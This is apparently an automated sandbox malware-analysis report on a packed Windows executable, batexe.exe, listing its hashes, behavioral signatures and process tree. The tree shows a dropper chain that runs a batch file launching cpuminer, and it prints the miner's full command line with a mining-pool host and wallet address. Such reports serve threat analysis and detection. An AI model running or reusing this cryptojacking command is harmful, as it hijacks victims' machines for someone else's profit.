Analysis
-
max time kernel
297s -
max time network
305s -
platform
windows10-1703_x64 -
resource
win10-20240214-ja -
resource tags
arch:x64arch:x86image:win10-20240214-jalocale:ja-jpos:windows10-1703-x64systemwindows -
submitted
18/02/2024, 01:54
Behavioral task
behavioral1
Sample
batexe.exe
Resource
win10-20240214-ja
Behavioral task
behavioral2
Sample
batexe.exe
Resource
win10v2004-20231215-ja
General
-
Target
batexe.exe
-
Size
9.4MB
-
MD5
cdc9eacffc6d2bf43153815043064427
-
SHA1
d05101f265f6ea87e18793ab0071f5c99edf363f
-
SHA256
73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
-
SHA512
fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
-
SSDEEP
196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv
Malware Config
Signatures
-
Executes dropped EXE 2 IoCs
pid Process 4892 b2e.exe 3124 cpuminer-sse2.exe -
Loads dropped DLL 5 IoCs
pid Process 3124 cpuminer-sse2.exe 3124 cpuminer-sse2.exe 3124 cpuminer-sse2.exe 3124 cpuminer-sse2.exe 3124 cpuminer-sse2.exe -
resource yara_rule behavioral1/memory/1764-6-0x0000000000400000-0x000000000393A000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 1764 wrote to memory of 4892 1764 batexe.exe 73 PID 1764 wrote to memory of 4892 1764 batexe.exe 73 PID 1764 wrote to memory of 4892 1764 batexe.exe 73 PID 4892 wrote to memory of 3840 4892 b2e.exe 74 PID 4892 wrote to memory of 3840 4892 b2e.exe 74 PID 4892 wrote to memory of 3840 4892 b2e.exe 74 PID 3840 wrote to memory of 3124 3840 cmd.exe 77 PID 3840 wrote to memory of 3124 3840 cmd.exe 77
Processes
-
C:\Users\Admin\AppData\Local\Temp\batexe.exe"C:\Users\Admin\AppData\Local\Temp\batexe.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1764 -
C:\Users\Admin\AppData\Local\Temp\2769.tmp\b2e.exe"C:\Users\Admin\AppData\Local\Temp\2769.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\2769.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4892 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2F77.tmp\batchfile.bat" "3⤵
- Suspicious use of WriteProcessMemory
PID:3840 -
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.execpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 34⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3124
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
960KB
MD5d15ecf39e70d4d6e278b0da9ff36ba87
SHA12139694bf96cc3b6fbfadb8a9c8745b8901bff6a
SHA25604b2e6191d36dccb7b93c7d207ff16c0702cdec9b64b98206f9ffc7dc7633d54
SHA512326cdd9b35aa3dbd39d2fd4a22dd78f732d481f05ef6dca085cd086d8ca91502f3be961b44e5c4bbf2ebf947ffc4f1b4d4703593951fce22acaa418a77741434
-
Filesize
3.9MB
MD551fb195c824a4ecbe0d99bd354ff7348
SHA13ee06c23d1b6699d092c578b77c802625acababc
SHA256784571dfb2581ec3848cd8d88ab0e4cc52edcac0adceff292395fc2aa19b847f
SHA512e9821f284d05dfba4c7c127b394d834e82b8e1cb8d004e7ec25fc6f7583706e01b4bd9cbad6be2c8175dc5965e177d25b7a6151f58d9ce5d0db5d00aee48065c
-
Filesize
136B
MD58ea7ac72a10251ecfb42ef4a88bd330a
SHA1c30f6af73a42c0cc89bd20fe95f9159d6f0756c5
SHA25665e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9
SHA512a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0
-
Filesize
513KB
MD505d4000f115496ebb33ff5d34d25b3f3
SHA1999515e2d8369cfb093d1cdde9cc7cc258922e04
SHA256fa13adc9066fa434d6f1338bafe16e5e2b5cfa882bbbcc97ea19daf53c2b53b1
SHA51259746d9ff5ccf0ab15550297abb656c91a5e11af1a22bc6fa15f4ace98eb76dae241cf6d8c6bba21362654947e8d3c4e36df2785c98127bd77938c707b19efaf
-
Filesize
383KB
MD5b07e6c21a1b7291b964b468f374809c6
SHA110446acfb54d5ff7b2b62f7be3f4fa3867d8f41a
SHA25667fc26af563c79334e6b677da61d9da188e023035f335e377ccff79a9b6aa2f9
SHA51252ef13c079d1949c7d1d151231479dd56781dff441d063d7d7d28438876fba46c754d79e047417b71dd16f3fe13e5f6b183397e2d17b33f8fdf5219e00bfae82
-
Filesize
440KB
MD5ac40bd6a6595ea567050268de0bc879e
SHA108416d11d50236a7516ae68b7eaba5992ba9dea2
SHA256500ef60956c0cbf78a9084e2884162dd6eb58ae8bd781fab94f72c79a8195a57
SHA5124608488d52b66a60216658893fec524ca9ba190909ff8b73b799fa976a8e427f80619c280cab4332d40d93809f6f82893d3c49dc7d5c8de42ac0c34fa448654a
-
Filesize
367KB
MD550f5fb03288d68cee6c915b6a78cb211
SHA1a7a117fe038935760a4217598ed6e1c18cba1aaf
SHA25657c475622c4a5a5aa95935a976a9fd5a3a087339e16b69d08bc77cd817c8d794
SHA512dc907de24da7114a561b06755923ec42b15f2c906e20dfb0bc8933ca42867716d5c6c7ff0f119bc3b2937780ae0665ce4cc415d38ad35e9163cb4fa54161b0d8
-
Filesize
431KB
MD50985aba3a14e7f4b1d29ef01c5925d5c
SHA1b08c92a03b74f06b235d646ffad51c2f8f9b03b9
SHA2566c4c552a9c703e503489862ee5feec1cd9bcec842cdee4d0375abea7c28298d3
SHA512a11841858e3bd65b43c443601dfe1f103218a22ab5ef3212b9dc46be3e7a55691d1b78498ce85c6ed8454090e362f49076d4f704503d82e91b27defb210ba0a6
-
Filesize
388KB
MD5f4c6fd740f7d31f982a48ebd29394daa
SHA1b29eba375400b51747d38a8ff8e23d1d8f8310ee
SHA256bf99e21c141d90274e6933b84b3b7b3144f0eea7dcc797b027ff5fbfb9305156
SHA512aaf05af4b896a9f272eeb825dbe0edc6d4141482d36b786d22e321d1a7c8ca3eff87393bfdaa9acd2256bab1f2296851cd87fe98c9b5ccb95b0281ce6bb13887
-
Filesize
460KB
MD5446cca8b23682404ae02823ebb4f161f
SHA1cacf0de2a26d661fa890d7ab53845003ee6d9a87
SHA25662424a24ee0239ec88f801e398852f6ac31c6146091ee968d60509aaf2b65471
SHA5127df6292d3fafd692d7a1001221e570401acd813eb295a9bbf9a28b9b79cf6d329b8c1d4594f6af3e8a16a0094306fc064ddcae3635a6057578b85de4a5541faf
-
Filesize
237KB
MD57ee53877ac2f1965db7f813a68ebdceb
SHA1ee97e27da569656b28c0b2065a5f0ec9b4a1418a
SHA25677fb404930b71d72a588bb004d316e3539285819d4a36001d382684978acb0c3
SHA5123cb1a549474e9755ae34285c9dce45b13b4dbd41db7859c1329b1d6b4d730db36c306773782c2d5397146fcf1b1460d68320eca5a2d92a48081e1d6c0b3b4012
-
Filesize
365KB
MD515a2bc17a77275b3ca135144339a576c
SHA1d1bc7e249ebaa8f33eabb8b083bcbc17d027f01b
SHA25657e1cb9e08fd7504b66f3c5865fce6948fbd7442cdc9af83addf9f6a2dcbd5ca
SHA5126c196143e076ddb4b8d4b31d677e81a95898efa2ea88364db0dc492d30bc2a1a350e34bcdaed95091ad2573c670c88c18eabd40802597c7ad6e642d95c7d6522
-
Filesize
414KB
MD58c9b5382a86a84c967deef7cab42a75e
SHA1296da9c28ec6da0cbcac3cfa6f2db8a61540ce26
SHA2562dcf63d53884d8da22ba52a96635a68034755cfe5e83818095d91fb3adbe4991
SHA512befb9714adcf54bddd75ef91520eaee68ec0a6c4ac1f2a6693a6d9bf0ba6f5af747a53781ef02d76b4d6b51b281a341abb03e7a306007bf7232477183c31bc0d
-
Filesize
498KB
MD5eae8a1d50cd2f0670193e72e904e8e3a
SHA1d41d9aa9f1ff1522fd1ae93630bb67da89d70064
SHA256542d729517a6386bb978681fef6cb7df523f860052adae594ea9aa3308a68146
SHA512195550751b3e7509397ecf028ed869f2e0c848824416a80de0d5b02543db374c64b747c1a5884f6e76677bfd0eaebb2d662ca79584fb795378851c81f20afe29